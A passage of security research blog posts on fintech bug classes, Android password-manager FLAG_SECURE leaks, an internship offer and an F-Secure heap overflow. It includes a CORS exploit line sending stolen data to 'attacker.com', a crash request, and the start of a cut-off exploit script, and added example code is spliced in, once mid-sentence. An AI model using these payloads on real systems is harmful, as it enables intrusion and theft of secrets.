    location = 'https://attacker.com/?dump=' + this.responseText;
};
</script>
</body>
</html>
```

When the victim visits the crafted page, the attacker can perform a request to `https://bitcoinbank/keys` and retrieve their secret keys.

This can also happen when the `Access-Control-Allow-Origin` response header is dynamically set to the same domain as specified by the Origin request header.

References:

- https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties
- https://blog.detectify.com/2018/04/26/cors-misconfigurations-explained/

Checklist:

- Ensure that your `Access-Control-Allow-Origin` is never set to `null`
- Ensure that `Access-Control-Allow-Origin` is not taken from a user-controlled variable or header
- Ensure that you are not dynamically copying the value of the `Origin` HTTP header into `Access-Control-Allow-Origin`

2) Asserts and Compilers

In some programming languages, optimizations performed by the compiler can have undesirable results. This could manifest in many different quirks due to specific compiler or language behaviors; however, there is a specific class of idiosyncrasies that can have devastating effects.

Let's consider this Python code as an example:

```python
# All deposits should belong to the same CRYPTO address
assert all([x.deposit_address == address for x in deposits])
```

At first sight, there is nothing wrong with this code. Yet, there is actually a quite severe bug. The problem is that Python runs with `__debug__` enabled by default, which allows assert statements like the security control illustrated above to execute. When the code gets compiled to optimized byte code (`*.pyo` files) and lands in production, all asserts are gone. As a result, the application will not enforce any security checks.

Similar behaviors exist in many languages and with different compiler options, including C/C++, Swift, Closure and many more.

For example, let's consider the following Swift code:

```swift
// No assert if password is == mysecret
if (password != "mysecretpw") {
    assertionFailure("Password not correct!")
}
```

If you were to run this code in Xcode, it would simply hit your `assertionFailure` in case of an incorrect password. This is because Xcode compiles the application without any optimizations, using the `-Onone` flag. If you were to build the same code for the App Store instead, the check would be optimized out, leading to no password check at all since execution simply continues. Note that there are many things wrong in those three lines of code.

Talking about assertions, PHP takes first place and de facto facilitates RCE when you run asserts with a string argument (https://wiki.php.net/rfc/deprecations_php_7_2#assert_with_string_argument). This is due to the argument getting evaluated through the standard `eval`.

References:

- https://medium.com/@alecoconnor/asserts-in-swift-and-why-you-should-be-using-them-6a7c96eaec10
- https://docs.openstack.org/bandit/latest/plugins/b101_assert_used.html
- https://wiki.php.net/rfc/deprecations_php_7_2#assert_with_string_argument

Checklist:

- Do not use `assert` statements for guarding code and enforcing security checks
- Research compiler optimization gotchas in the language you use

3) Arithmetic Errors

A bug class that is also easy to overlook in fin-tech systems pertains to arithmetic operations. Negative numbers and overflows can create money out of thin air.

For example, let's consider a withdrawal function that looks at the amount of money in a certain wallet. Being able to pass a negative number could be abused to generate money for that account.

Imagine the following example code:

```python
if data["wallet"].balance < data["amount"]:
    error_dict["wallet_balance"] = ("Withdrawal exceeds available balance")
    ...
data["wallet"].balance = data["wallet"].balance - data["amount"]
```

The `if` statement correctly checks whether the balance is higher than the requested amount. However, the code does not enforce the use of a positive number.

Let's try with `-100` coins in a wallet account having `200` coins.

The check would be satisfied and the code responsible for updating the amount would look like the following:

```python
data["wallet"].balance = 200 - (-100) # 300 coins
```

This would enable an attacker to get free money out of the system.

Talking about numbers and arithmetic, there are also well-known bugs affecting lower-level languages in which `signed` vs `unsigned` types come into play.

In most architectures, a `signed` short integer is a 2-byte type that can hold either a negative or a positive number. In memory, positive numbers are represented as `1 == 0x0001`, `2 == 0x0002` and so forth. Instead, negative numbers are represented in two's complement: `-1 == 0xffff`, `-2 == 0xfffe` and so forth. These representations meet at `0x7fff`, which enables a signed integer to hold a value between `-32768` and `32767`.

Let's take a look at an example with pseudo-code:

```c
signed short int bank_account = -30000;
```

Assuming the system still allows withdrawals (e.g. perhaps a loan), the following code will be exercised:

```c
int withdraw(signed short int money){
    bank_account -= money;
}
```

As we know, the max negative value is `-32768`. What happens if a user withdraws `2768 + 1`?

```c
withdraw(2769); //32767
```

Yes! No longer in debt thanks to integer wrapping.
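Sections 2 and 3 above describe two ways the guard around a withdrawal can vanish: the assert is stripped by the optimizer, or the arithmetic is never checked for sign and range. The following Python block is an added example written for this post, not code from Doyensec's audits: it compiles the assert-style guard twice with Python's own `compile(..., optimize=...)` so the check can be seen disappearing under `-O` semantics, then gives a `withdraw()` that enforces the checklist points with explicit exceptions and `Decimal` arithmetic, and finally reproduces the 16-bit signed wrap from the C snippet so the `32767` result can be checked. All balances and amounts are constructed values.

```python
"""Withdrawal guards that survive the optimizer.

Added example for this post (not Doyensec audit code). Part 1 compiles the
assert-style guard twice: optimize=0 is the plain interpreter, optimize=1 is
what `python -O` (and shipping optimized *.pyo bytecode) does, and it drops
the assert. Part 2 is a withdraw() that enforces the checklist explicitly.
Part 3 reproduces the 16-bit signed wrap from the C snippet above.
All balances and amounts are constructed sample values.
"""
from decimal import Decimal, InvalidOperation

# Part 1: the assert-based guard kept as source text so it can be compiled twice
ASSERT_GUARD_SRC = """
def withdraw_with_assert(balance, amount):
    # Reads like a security check, but assert is a debug-only statement
    assert amount > 0, "amount must be positive"
    return balance - amount
"""


def run_assert_guard(balance, amount, optimize):
    """Compile the assert guard at `optimize` (0 or 1) and call it once.

    Returns the resulting balance, or 'rejected' if the assert fired.
    """
    namespace = {}
    exec(compile(ASSERT_GUARD_SRC, "<guard>", "exec", optimize=optimize), namespace)
    try:
        return namespace["withdraw_with_assert"](balance, amount)
    except AssertionError:
        return "rejected"


# Part 2: explicit validation that no compiler flag can remove
class WithdrawalError(ValueError):
    """Raised for any withdrawal the system must refuse."""


def withdraw(balance, amount) -> Decimal:
    """Return the new balance after withdrawing `amount`, else raise WithdrawalError.

    Values are parsed as Decimal (no float rounding); the amount must be a
    finite, strictly positive number not exceeding the balance. Every refused
    path raises, so nothing here depends on __debug__.
    """
    try:
        bal = Decimal(str(balance))
        amt = Decimal(str(amount))
    except InvalidOperation:
        raise WithdrawalError("balance or amount is not a number") from None
    if not amt.is_finite() or amt <= 0:
        raise WithdrawalError("amount must be a positive number")
    if amt > bal:
        raise WithdrawalError("withdrawal exceeds available balance")
    return bal - amt


def withdrawal_rejected(balance, amount) -> bool:
    """True when withdraw() refuses the request; convenient for tests and monitoring."""
    try:
        withdraw(balance, amount)
    except WithdrawalError:
        return True
    return False


# Part 3: the signed short wrap-around from the C example, bit-exact
def to_signed16(value: int) -> int:
    """Interpret an integer as a 16-bit two's complement value (wraps like a C short)."""
    value &= 0xFFFF
    return value - 0x10000 if value & 0x8000 else value


def c_withdraw_short(bank_account: int, money: int) -> int:
    """bank_account -= money with 16-bit wrap, mirroring the post's C snippet."""
    return to_signed16(bank_account - money)


if __name__ == "__main__":
    print(run_assert_guard(200, -100, optimize=0))  # rejected
    print(run_assert_guard(200, -100, optimize=1))  # 300: the guard is gone
    print(withdrawal_rejected(200, -100))           # True
    print(c_withdraw_short(-30000, 2769))           # 32767
```

The two `run_assert_guard` calls use identical source; only the optimization level differs, which is exactly the difference between a developer's machine and an optimized production build. `withdraw()` refuses the `-100` request the post walks through, and `c_withdraw_short(-30000, 2769)` returns the same `32767` the C example arrives at, which is the value to watch for when auditing fixed-width balance fields.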
Current balance is now `32767`.

#### References:

- https://blog.feabhas.com/2014/10/vulnerabilities-in-c-when-integers-go-bad/
- https://en.cppreference.com/w/cpp/language/types
- https://gcc.gnu.org/ml/gcc-help/2011-07/msg00219.html

#### Checklist:

- Verify that the transaction systems and other components dealing with financial arithmetic do not accept negative numbers
- Verify integer boundaries, and whether the correct `signed` vs `unsigned` types are used across the entire codebase. Note that signed integer overflow is considered *undefined behavior*.

## 4) Password Reset Token Leakage Via Referer

Last but not least, we would like to introduce a simple infoleak bug. This is a very widespread issue present in the password reset mechanism of many web platforms.

![Vulnerability Impact](../../../public/images/passwordreset.png)

A standard procedure for a password reset in modern web applications involves the use of a *secret* link sent out to the user via email. The secret is used as an authentication token to prove that the recipient had access to the email associated with the user's registration.

Those links typically take the form of `https://example.com/passwordreset/2a8c5d7e-5c2c-4ea6-9894-b18436ea5320` or `https://example.com/passwordreset?token=2a8c5d7e-5c2c-4ea6-9894-b18436ea5320`.

But what actually happens when the user clicks the link?

When a web browser requests a resource, it typically adds an HTTP header called `Referer`, indicating the URL of the resource from which the request originated. If the resource being requested resides on a different domain, the `Referer` header is still generally included in the cross-domain request. It is not uncommon for the password reset page to load external JavaScript resources such as libraries and tracking code. Under those circumstances, the password reset token will also be sent to the third-party domains.

```
GET /libs/jquery.js HTTP/1.1
Host: 3rdpartyexampledomain.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Referer: https://example.com/passwordreset/2a8c5d7e-5c2c-4ea6-9894-b18436ea5320
Connection: close
```

As a result, personnel working for the affected third-party domains and having access to the web server access logs might be able to take over accounts of the vulnerable web platform.

#### References:

- https://portswigger.net/kb/issues/00500400_cross-domain-referer-leakage
- https://thoughtbot.com/blog/is-your-site-leaking-password-reset-links

#### Checklist:

- If possible, applications should never transmit any sensitive information within the URL query string
- In case of password reset links, the `Referer` header should always be removed using one of the following techniques:
  - Blank landing page under the web platform domain, followed by a redirect
  - Originate the navigation from a pseudo-URL document, such as `data:` or `javascript:`
  - Using `<iframe src="about:blank">`
  - Using `<meta name="referrer" content="no-referrer" />`
  - Setting an appropriate `Referrer-Policy` header, assuming your application supports recent browsers only

**If you would like to talk about securing your platform, contact us at [email protected]@doyensec.com!**
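The following is an added example, not code from the post: it models which `Referer` value a browser attaches to the third-party script request above under each `Referrer-Policy` (a simplified form of the W3C Referrer Policy algorithm), and scans constructed third-party access log lines for reset tokens that did leak. The sample URLs, log lines and the token value are constructed placeholders.

```python
"""Added example (not from the original post): (1) which Referer value a browser
sends from the password-reset page to a third-party script under each
Referrer-Policy, following the W3C Referrer Policy algorithm in simplified form,
and (2) a scan of third-party access logs for reset tokens that did leak."""
import re
from urllib.parse import urlsplit, urlunsplit

# Constructed sample URLs; the token is the placeholder value used in the post.
RESET_URL = "https://example.com/passwordreset/2a8c5d7e-5c2c-4ea6-9894-b18436ea5320"
THIRD_PARTY_JS = "https://3rdpartyexampledomain.com/libs/jquery.js"

POLICIES = ("no-referrer", "no-referrer-when-downgrade", "same-origin", "origin",
            "strict-origin", "origin-when-cross-origin",
            "strict-origin-when-cross-origin", "unsafe-url")


def _origin(url):
    p = urlsplit(url)
    return f"{p.scheme}://{p.netloc}/"


def _strip(url):
    """A full referrer: scheme, host, port, path and query; never userinfo or fragment."""
    p = urlsplit(url)
    host = p.hostname or ""
    if p.port:
        host = f"{host}:{p.port}"
    return urlunsplit((p.scheme, host, p.path, p.query, ""))


def referer_sent(source, destination, policy=""):
    """Referer header value the browser attaches to a request for `destination`
    issued from the page at `source`, or None when nothing is sent.  An empty
    policy means "browser default": no-referrer-when-downgrade, the default at the
    time of the post (Chrome 85 and Firefox 87 later switched it to
    strict-origin-when-cross-origin)."""
    policy = policy or "no-referrer-when-downgrade"
    if policy not in POLICIES:
        raise ValueError(f"unknown Referrer-Policy: {policy}")
    same_origin = _origin(source) == _origin(destination)
    downgrade = (urlsplit(source).scheme == "https"
                 and urlsplit(destination).scheme == "http")
    full, origin = _strip(source), _origin(source)
    if policy == "no-referrer":
        return None
    if policy == "unsafe-url":
        return full
    if policy == "no-referrer-when-downgrade":
        return None if downgrade else full
    if policy == "same-origin":
        return full if same_origin else None
    if policy == "origin":
        return origin
    if policy == "strict-origin":
        return None if downgrade else origin
    if policy == "origin-when-cross-origin":
        return full if same_origin else origin
    # strict-origin-when-cross-origin
    if same_origin:
        return full
    return None if downgrade else origin


def token_leaks(source, destination, policy=""):
    """True when the Referer carries more than the bare origin, i.e. the path or
    query string that holds the reset token."""
    ref = referer_sent(source, destination, policy)
    return ref is not None and ref != _origin(source)


# --- third-party side: what lands in 3rdpartyexampledomain.com's access log ---
# Constructed Combined Log Format lines; the referrer is the second-to-last quoted field.
LOG_LINES = [
    '203.0.113.7 - - [10/Mar/2018:10:01:22 +0000] "GET /libs/jquery.js HTTP/1.1" 200 8821 '
    '"https://example.com/passwordreset/2a8c5d7e-5c2c-4ea6-9894-b18436ea5320" "Mozilla/5.0"',
    '203.0.113.8 - - [10/Mar/2018:10:01:40 +0000] "GET /libs/jquery.js HTTP/1.1" 200 8821 '
    '"https://example.com/" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Mar/2018:10:02:03 +0000] "GET /tracker.js HTTP/1.1" 200 512 '
    '"https://example.com/passwordreset?token=2a8c5d7e-5c2c-4ea6-9894-b18436ea5320" "Mozilla/5.0"',
]
REFERER_FIELD = re.compile(r'"([^"]*)" "[^"]*"$')
RESET_TOKEN = re.compile(
    r"/passwordreset(?:/|\?token=)([0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12})")


def find_leaked_tokens(lines):
    """Return (referrer, token) for every log line whose Referer carries a reset token."""
    hits = []
    for line in lines:
        m = REFERER_FIELD.search(line)
        if not m:
            continue
        t = RESET_TOKEN.search(m.group(1))
        if t:
            hits.append((m.group(1), t.group(1)))
    return hits


if __name__ == "__main__":
    for policy in POLICIES:
        print(f"{policy:32} -> {referer_sent(RESET_URL, THIRD_PARTY_JS, policy)}")
    print(find_leaked_tokens(LOG_LINES))
```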

One Bug To Rule Them All: Modern Android Password Managers and FLAG_SECURE Misuse

21 August 2019 at 22:00
A few months ago I stumbled upon a 2016 [blog post](https://commonsware.com/blog/2016/06/06/psa-flag-secure-window-leaks.html) by Mark Murphy, warning about the state of `FLAG_SECURE` window leaks in Android. This class of vulnerabilities has been around for a while, hence I wasn't confident that I could still leverage the same weakness in modern Android applications. As it often turns out, I was being too optimistic. After a brief survey, I discovered that the issue still persists today in many password manager applications (and others).

## The problem

The [`FLAG_SECURE`](https://developer.android.com/reference/android/view/WindowManager.LayoutParams.html#FLAG_SECURE) setting was initially introduced as an additional setting to `WindowManager.LayoutParams` to prevent DRM-protected content from appearing in screenshots, video screencaps or from being viewed on "[non-secure displays](https://developer.android.com/reference/android/view/Display.html#FLAG_SECURE)".

This last term was created to distinguish between [virtual screens](<https://developer.android.com/reference/android/media/projection/MediaProjection#createVirtualDisplay(java.lang.String,%2520int,%2520int,%2520int,%2520int,%2520android.view.Surface,%2520android.hardware.display.VirtualDisplay.Callback,%2520android.os.Handler)>) created by the [MediaProjection API](https://developer.android.com/reference/android/media/projection/MediaProjection) (a native API to capture screen contents) and physical display devices like TV screens (having a DRM-secure video output). In this way Google forestalled the piracy apps issue by preventing unsigned apps from creating virtual "secure" displays, only allowing casting to physical "secure" devices.
While `FLAG_SECURE` nowadays serves its original purpose well *(to the delight of e.g. Netflix, Google Play Movies, Youtube Red)*, **over the years developers mistook this "secure" flag for an easy catch-all security feature** provided by Android to exempt the entire app from screen capture or recording.

Unfortunately, **this functionality is not global for the entire app**, but can only be set on specific screens that contain sensitive data. To make matters worse, every Android fragment used in the application will not respect the `FLAG_SECURE` set for the activity and won't pass down the flag to any other `Window` instances created on behalf of that activity. As a consequence, several native UI components like `Spinner`, `Toast`, `Dialog`, `PopupWindow` and many others will still leak their content to third-party applications having the right permissions.

## The approach

After a short survey, I decided to investigate a category of apps in which a content leak would have had the biggest impact: mobile password managers. This would also be the category of applications a generic attacker would probably choose to target first, along with banking apps.
With this in mind, I fired up a screen capture application ([mnml](https://github.com/afollestad/mnml)) and started poking around. After a few days of testing, **every Android password manager examined (4) was found to be vulnerable to some extent**.

The following sections provide a summary of the discovered issues. All vulnerabilities were disclosed to the vendors throughout the second week of May 2019.

### 1Password

In [1Password](https://1password.com/), the Account Settings section offers a way to manage 1Password accounts. One of the functionalities is "Large Type", which allows showing an account's Secret Key in a large, easy-to-read format. The fragment showing the Secret Key leaks the generated password to third-party applications installed on the victim's device. The Secret Key is combined with the user's Master Password to create the full encryption key used to encrypt the accounts data, [protecting them on the server side](https://support.1password.com/secret-key-security/#how-your-secret-key-protects-you).

![1Password Secret Key Leak Vulnerability](../../../public/images/1password-leak.jpg)

This was fixed in 1Password for Android in version [7.1.5](https://app-updates.agilebits.com/product_history/OPA4#v70105057), which was released on May 29, 2019.

### Keeper

When a user taps the password field, [Keeper](https://keepersecurity.com/) shows a "Copied to Clipboard" toast. But if the user shows the cleartext password with the "Eye" icon, the toast will also contain the secret cleartext password. This fragment showing the copied password leaks the password to third-party applications.

![Keeper Password Leak Vulnerability (without FLAG_SECURE set)](../../../public/images/keeper-leak-1.jpg)
![Keeper Password Leak Vulnerability (with FLAG_SECURE set)](../../../public/images/keeper-leak-2.jpg)

This was fixed in Keeper for Android version 14.3.0, which was released on June 21, 2019. [An official advisory was also issued](https://docs.keeper.io/release-notes/mobile-platforms/android/android-version-14.3.0).

### Dashlane

Dashlane features a random password generation functionality, usable when an account entry is inserted or edited. Unfortunately, the window responsible for choosing the parameters for the "safe" passwords is visible to third-party applications on the victim's device.

![Dashlane Password Leak Vulnerability](../../../public/images/dashlane-leak-1.jpg)

Note that it is also possible for an attacker to infer the service associated with the leaked password, since the services list and autocomplete fragment is also missing the `FLAG_SECURE` flag, resulting in its leak.

![Dashlane Leak Vulnerability](../../../public/images/dashlane-leak-2.jpg)
![Dashlane Leak Vulnerability](../../../public/images/dashlane-leak-3.jpg)

The issue was fixed in Dashlane for Android in version [6.1929.2](https://support.dashlane.com/hc/en-us/articles/206553939-Release-notes#title2).

## The attack scenario

Several scenarios would result in an app being installed on a user's phone recording their activity. These include:

- Malicious casting apps requiring record permission, since users usually don't know that casting apps can also record their screen;
- Innocuous-looking apps using [Cloak & Dagger](http://cloak-and-dagger.org/) attacks;
- Malicious apps installed through third-party Android app stores or [bypassing](https://www.blackhat.com/docs/us-17/thursday/us-17-Anderson-Bot-Vs-Bot-Evading-Machine-Learning-Malware-Detection-wp.pdf) the [PHA (Potentially Harmful Applications) detection filters](https://security.googleblog.com/2018/03/android-security-2017-year-in-review.html) of the Play Store;
- Malicious apps pushed to the smartphone using the Play Store feature in a [Man-in-the-Browser](http://fc16.ifca.ai/preproceedings/24_Konoth.pdf) attack scenario.

If these scenarios seem unlikely to happen in real life, it is worth noting that there have been [several](https://elleenpan.com/files/panoptispy.pdf) [instances](https://www.zdnet.com/article/android-security-password-stealing-trojan-malware-sneaks-in-google-play-store-in-bogus-apps/) of apps abusing this class of attacks in the recent past.

Many thanks to the *1Password*, *Keeper*, and *Dashlane* security teams that handled the report in a professional way, issued a payout, and allowed the disclosure. **Please remember that using a password manager is still the best choice these days to protect your digital accounts and that all the above issues are now fixed.**

As always, this research was possible thanks to my [25% research time](https://doyensec.com/careers.html) at Doyensec!
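As an added example that is not code from the post or from any of the vendors, the script below is a regex-based triage aid for the inheritance gap described under "The problem": it walks Activity sources and flags `Dialog`s whose own `Window` never receives `FLAG_SECURE`, and `Toast`/`PopupWindow` usages, which expose no public flag to set. `Dialog.getWindow()` and `Window.setFlags()`/`addFlags()` are real Android APIs; the Java fragments are constructed, and the matching is heuristic rather than a real parser.

```python
"""Added example (not from the original post, nor any vendor's code): a heuristic
source audit for the FLAG_SECURE gap described under "The problem". It is a
regex-based triage aid, not an Android parser; the sample files are constructed."""
import re

# A Dialog gets its own Window (dialog.getWindow()), so FLAG_SECURE can be set
# on it explicitly. Toast and PopupWindow expose no public window-flag API.
NEW_DIALOG = re.compile(r"(\w+)\s*=\s*new\s+Dialog\s*\(")
NO_FLAG_API = re.compile(r"(Toast\.makeText|new\s+PopupWindow)\s*\(")
# The Activity's own window: getWindow() with no receiver in front of it.
ACTIVITY_SECURE = re.compile(
    r"(?<![\w.])getWindow\(\)\s*\.\s*(?:setFlags|addFlags)\([^;]*FLAG_SECURE")
# A component's window: <var>.getWindow().setFlags/addFlags(... FLAG_SECURE ...)
WINDOW_SECURE = re.compile(
    r"(\w+)\.getWindow\(\)\s*\.\s*(?:setFlags|addFlags)\([^;]*FLAG_SECURE")

SAMPLE_SOURCES = {  # constructed Java fragments, not taken from any real app
    "SecretKeyActivity.java": """
        getWindow().setFlags(WindowManager.LayoutParams.FLAG_SECURE,
                             WindowManager.LayoutParams.FLAG_SECURE);
        Dialog largeType = new Dialog(this);
        largeType.setContentView(R.layout.large_type);
        largeType.show();
        Toast.makeText(this, secretKey, Toast.LENGTH_LONG).show();
    """,
    "SafeDialogActivity.java": """
        getWindow().addFlags(WindowManager.LayoutParams.FLAG_SECURE);
        Dialog d = new Dialog(this);
        d.getWindow().setFlags(WindowManager.LayoutParams.FLAG_SECURE,
                               WindowManager.LayoutParams.FLAG_SECURE);
        d.show();
    """,
    "LoginActivity.java": """
        setContentView(R.layout.login);  // nothing is marked secure here
    """,
}


def audit_file(name, source):
    """Return a list of findings for one Activity source file."""
    findings = []
    if not ACTIVITY_SECURE.search(source):
        findings.append(f"{name}: Activity window never sets FLAG_SECURE")
    secured = set(WINDOW_SECURE.findall(source))
    for var in NEW_DIALOG.findall(source):
        if var not in secured:
            findings.append(
                f"{name}: Dialog '{var}' shown without FLAG_SECURE on its own Window")
    for m in NO_FLAG_API.finditer(source):
        findings.append(
            f"{name}: {m.group(1)} has no FLAG_SECURE control; review what it displays")
    return findings


def audit_sources(sources):
    """Map each file name to its findings."""
    return {name: audit_file(name, src) for name, src in sources.items()}


if __name__ == "__main__":
    for name, findings in audit_sources(SAMPLE_SOURCES).items():
        for line in findings or [f"{name}: no findings"]:
            print(line)
```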

Internship at Doyensec

4 November 2019 at 23:00
> *"Our moral responsibility is not to stop the future, but to shape it…"* — Alvin Toffler

At Doyensec, we feel responsible for what the future of information security will look like. We want a safe and open Internet and we believe that *hackers* play an important role. As a part of our give-back strategy, we want to find ways of transferring our knowledge to new generations.

Doyensec interns work alongside experienced security researchers during live customer engagements. They receive full-time support from senior staff members and are encouraged to explore individual research projects. Additionally, they are included in all team meetings so they can learn and share in the different experiences arising from our work. In short, we want to provide a comprehensive experience of what it means to be a first-class security consultant in the vulnerability research space.

The internship program @Doyensec represents an opportunity to learn new infosec skills. We also hope it becomes a memorable personal experience. It lasts 2-3 months and is a mix of remote and in-person interactions.

### We offer each candidate a transparent recruitment process in 3 simple steps:

1. Introductory call to understand one's motivation for applying and their availability over the upcoming months
2. Online challenges to evaluate technical skillset (web security testing)
3. Final call to discuss details

![Doyensec internship process](../../../public/images/intern.jpeg)

### Day 1

Day one is important. Interns will be responsible for setting up their Doyensec-provided machine and will be introduced to the team. They will be assigned to a senior security researcher who will be at their disposal and act as mentor throughout the entire internship. They will learn how we schedule projects, communicate, and cooperate to ensure complete coverage during our testing activities. We will provide them with all necessary equipment to perform the work. Most importantly, they will learn about our values and things that we consider crucial for delivering high quality work.

### Time allocation

While the internship is considered full time over the course of 2-3 months, we did have interns who were still studying and wanted to combine both work and school. We take pride in having a flexible company culture oriented around results, and our approach to the internship is no different.

> *"For knowledge work, time spent has little to do with value created and the forty hour workweek is anachronistic nonsense."* — Naval Ravikant @naval

Work days are generally grouped into two categories:

a) **Customer projects**. Interns work on real-life projects. Whenever possible, we will try to match personal interest and skillset with tasks when allocating projects.

b) **Research time**. We strongly [believe in research](https://doyensec.com/research.html) and practice, therefore we allow interns to spend 50% of their time on *research* topics. We will define goals together and provide guidance and feedback on the progress.

### Testimonial

Mohamed Ouad is a student of computer science at the University of Milan. In the fall of 2018 he joined Doyensec as our second intern. We asked him a few questions to summarize his experience:

What did you learn during your internship?

*"During this period I had the possibility to learn a lot of things, and not just technical stuff. For instance, I understood how to explain findings to a non-technical audience and manage projects with strict deadlines."*

Have you improved your skillset?

*"Definitely! I improved my knowledge of Android security and got interested in Google Chrome extension security, static code review and Electron-based app security."*

Will the internship have an impact on your career?

*"This experience has given me a huge added value to my career path. I've not only learned a lot, but also created an important item in my curriculum that will certainly be useful for future opportunities. I suggest this "adventure" to everyone!"*

#### More information on our internship program

The Doyensec internship program is open to students returning to full-time education for at least one semester. We accept candidates with residency in either the US or Europe.

What we offer:

- Opportunity to perform professional security testing for both start-ups and Fortune 500 companies
- Ability to perform cutting-edge offensive research projects
- Feedback and guidance
- Attractive financial compensation

#### What do we expect from candidates?

Our perfect candidate:

- Has already some experience with manual source code review and Burp Suite / OWASP ZAP
- Learns quickly
- Should be able to prepare reports in English
- Is self-organized
- Is able to learn from his/her mistakes
- Has motivation to work/study and shows initiative
- Must be communicative (without this it is difficult to teach effectively)
- Brings something to the mix (e.g. creativity, academic knowledge, etc.)

In contrast to full-time positions (*we are always hiring web and mobile pentesters!*), a good attitude is the most important factor we are looking for.

**Do you want to join Doyensec as an intern?** Send your resume to [email protected]@doyensec.com!

Heap Overflow in F-Secure Internet Gatekeeper

2 February 2020 at 23:00
## F-Secure Internet Gatekeeper heap overflow explained

This blog post illustrates a vulnerability we discovered in the **F-Secure Internet Gatekeeper** application. It shows how a simple mistake can lead to an exploitable unauthenticated remote code execution vulnerability.

### Reproduction environment setup

All testing should be reproducible in a [CentOS](http://isoredirect.centos.org/centos/7/isos/x86_64/CentOS-7-x86_64-DVD-1908.iso) virtual machine, with at least 1 processor and 4GB of RAM.

An installation of [F-Secure Internet Gatekeeper](https://help.f-secure.com/product.html?business/igk/5.40/en/concept_16E400B3FDE344EDB1F699EE9C4117DB-5.40-en) will be needed. It used to be possible to download it from https://www.f-secure.com/en/business/downloads/internet-gatekeeper. As far as we can tell, the vendor no longer provides the vulnerable version.

The original affected package has the following SHA256 hash: `1582aa7782f78fcf01fccfe0b59f0a26b4a972020f9da860c19c1076a79c8e26`.

Proceed with the installation:

1. If you're using an x64 version of CentOS, execute `yum install glibc.i686`
2. Install the Internet Gatekeeper binary using `rpm -I <fsigkbin>.rpm`
3. For a better debugging experience, install gdb 8+ and https://github.com/hugsy/gef

Now you can use GHIDRA/IDA or your favorite disassembler/decompiler to start reverse engineering Internet Gatekeeper!

### The target

As described by F-Secure, Internet Gatekeeper is a "highly effective and easy to manage protection solution for corporate networks at the gateway level".

F-Secure Internet Gatekeeper contains an admin panel that runs on port *9012/tcp*. This may be used to control all of the services and rules available in the product (HTTP proxy, IMAP proxy, etc.). This admin panel is served over HTTP by the *fsikgwebui* binary which is written in C. In fact, the whole web server is written in C/C++; there are some references to civetweb, which suggests that a customized version of [CivetWeb](https://github.com/civetweb/civetweb) may be in use.

The fact that it was written in C/C++ led us down the road of looking for memory corruption vulnerabilities, which are common in these languages.

It did not take long to find the issue described in this blog post by fuzzing the admin panel with [Fuzzotron](https://github.com/denandz/fuzzotron), which uses [Radamsa](https://gitlab.com/akihe/radamsa) as the underlying engine. `fuzzotron` has built-in TCP support for easily fuzzing network services. For a seed, we extracted a valid `POST` request that is used for changing the language on the admin panel. This request can be performed by unauthenticated users, which made it a good candidate as a fuzzing seed.

When analyzing the input mutated by `radamsa` we could quickly see that the root cause of the vulnerability revolved around the `Content-Length` header. The generated test that crashed the software had the following header value: `Content-Length: 21487483844`. This suggests an overflow due to incorrect integer math.

After running the test through `gdb` we discovered that the code responsible for the crash lies in the `fs_httpd_civetweb_callback_begin_request` function. This method is responsible for handling incoming connections and dispatching them to the relevant functions depending on which HTTP verbs, paths or cookies are used.

To demonstrate the issue we're going to send a `POST` request to port `9012` where the admin panel is running. We set a very big `Content-Length` header value.

```
POST /submit HTTP/1.1
Host: 192.168.0.24:9012
Content-Length: 21487483844

AAAAAAAAAAAAAAAAAAAAAAAAAAA
```

The application will parse the request and execute the `fs_httpd_get_header` function to retrieve the content length. Later, the content length is passed to the function `strtoul` (*String to Unsigned Long*).

The following pseudo code provides a summary of the control flow:

```
content_len = fs_httpd_get_header(header_struct, "Content-Length");
if ( content_len ){
    content_len_new = strtoul(content_len_old, 0, 10);
}
```

What exactly happens in the `strtoul` function can be understood by reading the corresponding `man` pages. The return value of `strtoul` is an unsigned long int, which can have a largest possible value of `2^32-1` (on 32 bit systems).

```
The strtoul() function returns either the result of the conversion or, if there was a leading minus sign, the negation of the result of the conversion represented as an unsigned value, unless the original (nonnegated) value would overflow; in the latter case, strtoul() returns ULONG_MAX and sets errno to ERANGE. Precisely the same holds for strtoull() (with ULLONG_MAX instead of ULONG_MAX).
```

As our provided `Content-Length` is too large for an unsigned long int, `strtoul` will return the ULONG_MAX value which corresponds to `0xFFFFFFFF` on 32 bit systems.

So far so good. Now comes the actual bug. When the `fs_httpd_civetweb_callback_begin_request` function tries to issue a malloc request to make room for our data, it first adds 1 to the `content_length` variable and then calls `malloc`.

This can be seen in the following pseudo code:

```c
// fs_malloc == malloc
data_by_post_on_heap = fs_malloc(content_len_new + 1)
```

This causes a problem as the value `0xFFFFFFFF + 1` will cause an integer overflow, which results in `0x00000000`. So the malloc call will allocate 0 bytes of memory.

malloc does allow invocations with a 0 bytes argument. When `malloc(0)` is called a valid pointer to the heap will be returned, pointing to an allocation with the minimum possible chunk size of 0x10 bytes. The specifics can also be read in the man pages:

```
The malloc() function allocates size bytes and returns a pointer to the allocated memory. The memory is not initialized. If size is 0, then malloc() returns either NULL, or a unique pointer value that can later be successfully passed to free().
```

If we go a bit further down in the Internet Gatekeeper code, we can see a call to `mg_read`.

```c
// content_len_new is without the addition of 0x1.
// so content_len_new == 0xFFFFFFFF
if(content_len_new){
    int bytes_read = mg_read(header_struct, data_by_post_on_heap, content_len_new)
}
```

During the overflow, this code will read an arbitrary amount of data onto the heap - without any restraints. For exploitation, this is a great primitive since we can stop writing bytes to the HTTP stream and the software will simply shut the connection and continue. Under these circumstances, we have complete control over how many bytes we want to write.

In summary, **we can leverage malloc's chunks of size 0x10 with an overflow of arbitrary data to overwrite existing memory structures**. The following proof of concept demonstrates that. Despite being very raw, it exploits an existing struct on the heap by flipping a flag to `should_delete_file = true`, and then subsequently spraying the heap with the full path of the file we want to delete. The Internet Gatekeeper internal handler has a `decontruct_http` method which looks for this flag and removes the file. By leveraging this exploit, an attacker gains arbitrary file removal, which is sufficient to demonstrate the severity of the issue.

```python
# Python 2 / pwntools proof of concept (print statements, xrange and str payloads are Python 2)
from pwn import *
import time
import sys

def send_payload(payload, content_len=21487483844, nofun=False):
    r = remote(sys.argv[1], 9012)
    r.send("POST / HTTP/1.1\n")
    r.send("Host: 192.168.0.122:9012\n")
